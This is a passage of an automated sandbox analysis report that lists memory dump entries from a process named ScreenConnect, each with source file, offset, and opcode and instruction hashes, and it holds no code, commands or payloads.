                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 23d9864e94377c8ff5457878038bb4d7188b8e7c60ff018270b60cf819572248
                                                                • Instruction ID: 0929b4c1f549f58db83271bffe81ec95dc52f105dfa5d79eab9f864360266ddd
                                                                • Opcode Fuzzy Hash: 23d9864e94377c8ff5457878038bb4d7188b8e7c60ff018270b60cf819572248
                                                                • Instruction Fuzzy Hash: 38016D71B141059FE718CF6ACC48D7BBBFAFB89210B188569E846E7314DB70EC018BA0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94e29512ca270035c57bcdf67da8272f6f6dab9eb3de61ff97c952ce9946335d
                                                                • Instruction ID: e69de1c0dc6984f691697c11b10e20e09c36a1c0293550565cc3a33761876b7c
                                                                • Opcode Fuzzy Hash: 94e29512ca270035c57bcdf67da8272f6f6dab9eb3de61ff97c952ce9946335d
                                                                • Instruction Fuzzy Hash: 19018875B0020B9FCF14CBA8D8005EEBBB5EF54325F04817BD914D7204EB309915CB91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3915c6fa3090f680347f394d78c5e6534487dcf26e43177aebb8a4deefa7d09
                                                                • Instruction ID: 374460901768d32f1c87fd596fca92cbec021e104b65f84a6215dc560eb2ce8c
                                                                • Opcode Fuzzy Hash: a3915c6fa3090f680347f394d78c5e6534487dcf26e43177aebb8a4deefa7d09
                                                                • Instruction Fuzzy Hash: 40F0C23250B6908FC3129B2CD8A08D6BFB5DF9626030A41DBE581CB373C9248D06C7A5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 001d6a6eb903eb9ed4974ebcf1bf7371c626c998ccf3536de1dc0ae436d72d4e
                                                                • Instruction ID: 05f11cf0cd651aa30677b3d267d270017d2cc52b63ff02adcbae6d750d3293f0
                                                                • Opcode Fuzzy Hash: 001d6a6eb903eb9ed4974ebcf1bf7371c626c998ccf3536de1dc0ae436d72d4e
                                                                • Instruction Fuzzy Hash: B7012D312083846FD705CB64DC54EAE7FB6EF86260B04857FE419CB152E636DD02C760
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 550543a974141d3e6ead6ee870e5aa6025119d62896c2c5a57bec73c1c3a8e12
                                                                • Instruction ID: f6e0fa914ff09958a208885a9504cc00f360f177db8e171d6af8dc549dea8c86
                                                                • Opcode Fuzzy Hash: 550543a974141d3e6ead6ee870e5aa6025119d62896c2c5a57bec73c1c3a8e12
                                                                • Instruction Fuzzy Hash: F101DB769093855FC312CB65D824E9A7FBA9F96250B0DC0DBE544CB263D9348906CB61
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a827c2dfbfab87693c7b155c22f549e7fb9aaebb2c78d1369d1e63b3e21b230
                                                                • Instruction ID: 04a320a39aa9aff91b9fff743129e4e099d585798b520fca6f897cb6374fc68a
                                                                • Opcode Fuzzy Hash: 4a827c2dfbfab87693c7b155c22f549e7fb9aaebb2c78d1369d1e63b3e21b230
                                                                • Instruction Fuzzy Hash: 8E010030B50756CFDB14DF68D864BAE7BB2BB84340F108919D8169B394DF749987CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d21a510a6faa1985ae814d29337b6b43e1304bdfe2714aa2b37b58f3a989312
                                                                • Instruction ID: 05c131af44e6430b0873d072e373ae7e5944d938b83eae5e418d795e5cca93df
                                                                • Opcode Fuzzy Hash: 1d21a510a6faa1985ae814d29337b6b43e1304bdfe2714aa2b37b58f3a989312
                                                                • Instruction Fuzzy Hash: 76011A71E0021A8FCB40DFA9D8545AEBBF5FF88310B10866AD559E3301EB34AA158B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 042e73f95a5869d51dc528225d7d6c2bf14d01f6ae18704b44a137d4546c64ee
                                                                • Instruction ID: bc32888b90b8e394b90a63de70a1ecbb0f62b9b9a5ac4e4125456c79451212b5
                                                                • Opcode Fuzzy Hash: 042e73f95a5869d51dc528225d7d6c2bf14d01f6ae18704b44a137d4546c64ee
                                                                • Instruction Fuzzy Hash: 0BF0A43220410A6FDB05DFA4EC50DEB7FBEEF89210B048529F908D7210DB32D816C790
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3ba1cf35babc6e89330ce8d9e95d6c4e82902148c1815003b205df9a30fadbd
                                                                • Instruction ID: 473f86e05dfa5d8ea1a06d9116f9f9eb1ef797ed5adfdc91bd00b9155488c749
                                                                • Opcode Fuzzy Hash: a3ba1cf35babc6e89330ce8d9e95d6c4e82902148c1815003b205df9a30fadbd
                                                                • Instruction Fuzzy Hash: ECF02832B000189BEB159679FC182EEBBB5EBC8310F044679D64597280DF746D5987C0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 278273a8cf1596f5f5290c4f174955b5444f3fbca52e122be8bb12880454d5d6
                                                                • Instruction ID: 6bc2175d5aa1d606e59fc077c1d83405c136afdb1ab0bc21a4428d3e7dac8860
                                                                • Opcode Fuzzy Hash: 278273a8cf1596f5f5290c4f174955b5444f3fbca52e122be8bb12880454d5d6
                                                                • Instruction Fuzzy Hash: C3F09671B40312AFC725DA6EE99499BBBAADBC5650304856AE109C7304DF70E8078790
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 676cb2b831e4f6a410c0eca159722e225e4d4acef4524cd3953634227f9ccb1a
                                                                • Instruction ID: c382dd1b94c646444ee567e6df152f59d1a29f8ee4aab845592c2f5a2d5935a3
                                                                • Opcode Fuzzy Hash: 676cb2b831e4f6a410c0eca159722e225e4d4acef4524cd3953634227f9ccb1a
                                                                • Instruction Fuzzy Hash: E8F0963175A7818FDB16DB78D8658A93FF1EF4732134504EAD489CF1A7E6289807CB41
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f000595d636ee07c0c2cd94b0f909441340f3153b14de2b1959ae2dd755ccc3
                                                                • Instruction ID: 82f6d6a32b0dd66190e57c01d9ce692a71575f7e5ab14d3522a7a8599746cf71
                                                                • Opcode Fuzzy Hash: 3f000595d636ee07c0c2cd94b0f909441340f3153b14de2b1959ae2dd755ccc3
                                                                • Instruction Fuzzy Hash: 9CF08271F40316ABD724DA6FF99499BBB9EDBC5A60304856EE10A87304DF70E80687D0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b684324905aee0b0a1d2616b1236837092e8cb795bf2f9b82b89203367a97b24
                                                                • Instruction ID: 3d7e4151a7af1dce13df974163939b1828f848499bce66915b572caa1e8b728f
                                                                • Opcode Fuzzy Hash: b684324905aee0b0a1d2616b1236837092e8cb795bf2f9b82b89203367a97b24
                                                                • Instruction Fuzzy Hash: 9BF05E313002159BA714EAA9E840DAABBE9EF892A03148A2AE519CB354DB71EC458790
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99980d7ed08a201ba99615e742eeed4bfd2951689ad02fd44117bb1e3bc77e94
                                                                • Instruction ID: d0a6b152433dd2de4309253675580bce4edd20f7b0b1d2e3125b64046c6ab10e
                                                                • Opcode Fuzzy Hash: 99980d7ed08a201ba99615e742eeed4bfd2951689ad02fd44117bb1e3bc77e94
                                                                • Instruction Fuzzy Hash: 29F0A7317563514FC315D62DE890AA6B7B6EFCA76471444B9D108CB256C9369C43C750
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4dbf4c8bc4b51a5d6e4a29a153786f9ddcc61868a674ee621b16e66915cc2181
                                                                • Instruction ID: f6c1a044c95138fcc5b55dd5c4918943de1657a77cae8f1ffe6b3ab3ecc37a69
                                                                • Opcode Fuzzy Hash: 4dbf4c8bc4b51a5d6e4a29a153786f9ddcc61868a674ee621b16e66915cc2181
                                                                • Instruction Fuzzy Hash: E2F06D70D4030ACFDF10DFA9E8247AFBBB4EB84314F014969C61097240EF7495168F81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9517225211bd5d98dc471f5e183cdd0cc5a09a3bfdae01610f9a0cfb82759dd6
                                                                • Instruction ID: 81377aeb4c6f7c9efa14da9cee1b37b34df9b3d11b5bda9ad2e2cc17afd39bd7
                                                                • Opcode Fuzzy Hash: 9517225211bd5d98dc471f5e183cdd0cc5a09a3bfdae01610f9a0cfb82759dd6
                                                                • Instruction Fuzzy Hash: 8FF04970D4031ACFEB21EFA4E8287AEBBB1EB85314F014969C9119B245EF795916CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d62acf6aaf581dc03cf0897545400a9fd5c6758e034b1e8acb5a233115abd46
                                                                • Instruction ID: ec90cb87a67e4e2cd2e2311f2242b95e57b39396a653f5e062a96222e6dd3213
                                                                • Opcode Fuzzy Hash: 9d62acf6aaf581dc03cf0897545400a9fd5c6758e034b1e8acb5a233115abd46
                                                                • Instruction Fuzzy Hash: 74F030353057408FC314DB58C554A56BBF6EF8A714B5984A9E55A8B361C671EC02CB40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ebacd45906408bc2b7407f32184b21ecad6178402471f94b4ad402ea3c0e080e
                                                                • Instruction ID: 621871d9cf915b6fd61b29efe7b408f89e1750e7cb15af18fe295d7deb0f137f
                                                                • Opcode Fuzzy Hash: ebacd45906408bc2b7407f32184b21ecad6178402471f94b4ad402ea3c0e080e
                                                                • Instruction Fuzzy Hash: F3F07471D11219DFCB44DFADD841A9EBBF0FF49200B158166D928EB221E731AA528F84
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f30a0c02ca008c5ba0bcb5bd951ec01b909a6a572ad0f6a57ffee8cfb57b148
                                                                • Instruction ID: 384b7a78da1808e3a4874d12d2c66c64679547e90b5385ddac17ff3cd8f85d9a
                                                                • Opcode Fuzzy Hash: 2f30a0c02ca008c5ba0bcb5bd951ec01b909a6a572ad0f6a57ffee8cfb57b148
                                                                • Instruction Fuzzy Hash: 5BF03A31A002198BEB249B64D4287DEBAF6EF8C200F100539D402B7794CBB65D44CBE1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba8dcb81f7fe430fdf050e0aa0f696fced582c56dde609f6de9aa984fc3e535c
                                                                • Instruction ID: 81b7e910aed0365cf0f5beed5a3cccfc7a5bfa77dd5aec3285153dc5d490e321
                                                                • Opcode Fuzzy Hash: ba8dcb81f7fe430fdf050e0aa0f696fced582c56dde609f6de9aa984fc3e535c
                                                                • Instruction Fuzzy Hash: 83F03A30B0011ACFC714DF69D554AAABBE1EF88310B0480A9E915CB364EB75DD11CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f1ac557c9cf2411a93e34ccc5c1e63ba23d18992d54d33a6d9966859321611c
                                                                • Instruction ID: fdcf57bd10b668369bbf3bfd36f6b6ac5bb3d192de7aaaf455300f851f69fb61
                                                                • Opcode Fuzzy Hash: 2f1ac557c9cf2411a93e34ccc5c1e63ba23d18992d54d33a6d9966859321611c
                                                                • Instruction Fuzzy Hash: 89E0307A704219AB4754DA9AD800D5EBBAADBC8260718C056F918C7304DA71D9128764
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b6693b7859993b0cc6d64ee250178bc96be878ac930a89e8f6bb7b3d9343ce1
                                                                • Instruction ID: 251832289ebf7e39ed5bb0ccbbc010482078f6de642a76c912f4a650d117deec
                                                                • Opcode Fuzzy Hash: 0b6693b7859993b0cc6d64ee250178bc96be878ac930a89e8f6bb7b3d9343ce1
                                                                • Instruction Fuzzy Hash: 10F01735E00219CFCB10DFA8E8486DCBBB1FF8A310F1042A6E109AB220EB315A95CF51
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d792531246408b00d56b64556899947480d5de7ecaa184ce4f555232a1c3033
                                                                • Instruction ID: a88efd570b511b1d41d5931038882ae4ba7d4aee9930671b513381333e376a29
                                                                • Opcode Fuzzy Hash: 8d792531246408b00d56b64556899947480d5de7ecaa184ce4f555232a1c3033
                                                                • Instruction Fuzzy Hash: 10F08C319583848FC752EB7888514EDBFF0EE0A150B1948EBD588DB232E2348A06CB91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb97963d3a0438313c09b4372eabf9fa64aa73b5cea6713ced8be2db4fc29efd
                                                                • Instruction ID: addc205bc2a9d768dbfe7c4f961304f83deb582619fc230f25e99a50d36c0abb
                                                                • Opcode Fuzzy Hash: bb97963d3a0438313c09b4372eabf9fa64aa73b5cea6713ced8be2db4fc29efd
                                                                • Instruction Fuzzy Hash: 9AF07471E00219DF8B44DFADD84169EFBF5EF49210B64C56AD918E7211E731AA12CFD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 368604062ec2735a7d6136095fb90215a063897e909fddeecda888bae6d60734
                                                                • Instruction ID: 4d2766a4a9ab9dbb8d4e8f239f7443cd06657813d17e2aa08b6b1a7a7e98f1b4
                                                                • Opcode Fuzzy Hash: 368604062ec2735a7d6136095fb90215a063897e909fddeecda888bae6d60734
                                                                • Instruction Fuzzy Hash: 32E01A35301200CFD314DB59D544E56BBEAEFC9B25F5984A9E5098B7A1CB72FC41CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2e2e49c0abeb4ca183125fa0cccbe2c103f5c7b880c7e14a623000ac3b2d5d5
                                                                • Instruction ID: 387d2f6af6b8f01210bd3ddf39be6b08a33d4c8a98447c3549d40b50aa851282
                                                                • Opcode Fuzzy Hash: f2e2e49c0abeb4ca183125fa0cccbe2c103f5c7b880c7e14a623000ac3b2d5d5
                                                                • Instruction Fuzzy Hash: AFE08632B012155BC314952EE890AA7B3AAEFC9724B104879950DD7355DD76DC438690
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb46b4b010ba729113b094814ca81450602f339af2807ccfedd38042405fbc3d
                                                                • Instruction ID: fbfb12f100e144e777250035d524da7bb03ea8f4cef0d11989aaecbb83434b60
                                                                • Opcode Fuzzy Hash: cb46b4b010ba729113b094814ca81450602f339af2807ccfedd38042405fbc3d
                                                                • Instruction Fuzzy Hash: 09E0C972504248BFCF02CFB4E9549A97FB6FB09200F048499F94586211D7328A25EB50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ee038860b9833faa0717822003bb7980c833e7e92ffebfac896416ef0bae03d
                                                                • Instruction ID: 4c8a84d5dd698332b8860621de32badf80674dd6f91b8265e52eb87bcb3fd672
                                                                • Opcode Fuzzy Hash: 3ee038860b9833faa0717822003bb7980c833e7e92ffebfac896416ef0bae03d
                                                                • Instruction Fuzzy Hash: 8EE0DF30906349EFCB02DFB4E9516ADBBB2FF8730171056EAD405DB206DA321E02DB01
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: caff4c66826e32d705e19f9003d4322797ee20831b6a3dcd6b597ad93a9d4296
                                                                • Instruction ID: 0ee9b2d81939b95d4cdbf00a0349ba88343418e8c6cbb2f17740a4e6f35e2ae3
                                                                • Opcode Fuzzy Hash: caff4c66826e32d705e19f9003d4322797ee20831b6a3dcd6b597ad93a9d4296
                                                                • Instruction Fuzzy Hash: CFE01A322442509FD314CB68E499F92BBB4EB4A724F0505D8E6898F7B2C663EC41CB40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51c09113462da5ed638816c495abd244bf10dc32a3e7f25b2512f3754bd9e22e
                                                                • Instruction ID: 3e4af268b486e0c53c0bd58351100ee558d6a6367d00f7e5e367864d54bece57
                                                                • Opcode Fuzzy Hash: 51c09113462da5ed638816c495abd244bf10dc32a3e7f25b2512f3754bd9e22e
                                                                • Instruction Fuzzy Hash: 8BE0E5B6D00229CFCB44DFA8C9511ADFBB0FB48705B2484AAC929EB210E3315712DFC1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75c02c6d336f245416d30954bfc76e82633797118d1b377591a1216840f4e89f
                                                                • Instruction ID: b5173a6179e069e33bfdc257296a222008716a87da8e8e6d4dfe1e137599ac64
                                                                • Opcode Fuzzy Hash: 75c02c6d336f245416d30954bfc76e82633797118d1b377591a1216840f4e89f
                                                                • Instruction Fuzzy Hash: 13E0863090014DFFD745EBB5FD106ADBBB4E705304F004BA9D988E7240EA316E058B81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c40ca23b3d06a23eaf7b912e55e081a733f0c5334b7b14a4da92c9f557cf293
                                                                • Instruction ID: 8bb427f2b1a5d395bc5b8ac035fadda48c60a73104885983f2855dd520924608
                                                                • Opcode Fuzzy Hash: 6c40ca23b3d06a23eaf7b912e55e081a733f0c5334b7b14a4da92c9f557cf293
                                                                • Instruction Fuzzy Hash: EFD0123220531687F7289E9EE4403D5F799EB81351F148539E58DC7598D6B658818784
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba0d1e1da95faed56a27d3631971b8253757191c103118aa36e4b74da478ed75
                                                                • Instruction ID: 0c9b766c9b15cde6487b0373dbf62642ddaaa7eee2a02deac5d0dd023f925209
                                                                • Opcode Fuzzy Hash: ba0d1e1da95faed56a27d3631971b8253757191c103118aa36e4b74da478ed75
                                                                • Instruction Fuzzy Hash: D1E04F71E10109ABDB44EFB4E91579E7FB5EB89204F0085ACE508D7241EB326E068BC0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ae86c4a0c6e58e7c0f3239f6b1464b0a16a9348d6516f6d40e87ec84600b529e
                                                                • Instruction ID: da1b16c66e3909cc71cb25df35b94f24ba8cb402640d14139df50d08ea79b5ac
                                                                • Opcode Fuzzy Hash: ae86c4a0c6e58e7c0f3239f6b1464b0a16a9348d6516f6d40e87ec84600b529e
                                                                • Instruction Fuzzy Hash: 97E08632200014AFD7109F74E948FE87BB1FB48710F14C151F5448B220C7718C16DB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
